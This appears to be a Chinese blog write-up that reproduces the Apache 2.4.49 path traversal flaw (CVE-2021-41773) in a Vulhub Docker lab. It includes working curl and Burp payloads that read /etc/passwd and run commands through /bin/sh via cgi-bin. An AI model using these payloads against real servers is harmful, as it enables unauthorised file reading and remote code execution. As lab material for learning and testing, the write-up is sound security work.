Apache HTTP_2.4.49_路径穿越漏洞(CVE-2021-41773)

1.1、漏洞描述

Apache HTTP服务器项目致力于为现代操作系统（包括UNIX和Windows）开发和维护开源HTTP服务器。

在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护，则这些请求可以成功。如果CGI脚本也为这些别名路径启用，则可以允许远程代码执行。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49

1.4、漏洞复现

1、基础环境

Path：Vulhub/httpd/CVE-2021-41773

启动测试环境：

sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到

2、漏洞验证

方式一 curl

/icons/必须是现有目录

curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在服务器上启用mods cgi或cgid后，此路径遍历漏洞将允许执行任意命令

curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

方式二 bp抓包

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id

本栏目推荐文章
• 代码随想录 day18 找树左下角的值 路径总和 从中序与后序遍历序列构造二叉树
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• OFBiz RCE漏洞复现（CVE-2023-51467）
• web项目启动时dubbo报错： No provider available for the service com.davidhu.shopguide.api.service.UserEventService from the url zookeeper ://localhost:2181/org.apache.du
• 代码随想录 day17 平衡二叉树 二叉树的所有路径 左叶子之和
• 2016-4-3、路径解析
• linux ubantu新建用户su后不显示用户名、路径等前缀问题解决方案
• 如何判断一个网站是用的Nginx，还是Apache
• cdn引入vue后报错无法识路径 Uncaught TypeError: Failed to resolve module specifier "vue". Relative references must start with either "/", "./", or "../".
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest

路径 漏洞 Apache 41773 2021路径 漏洞apache 41773 apache-cve apache 41773 2021 漏洞apache 41773 httpd 路径 漏洞apache server 路径 漏洞apache 42013 漏洞apache 漏洞rocketmq代码apache 序列 漏洞apache shiro 漏洞apache tomcat 29885 漏洞apache 15715 httpd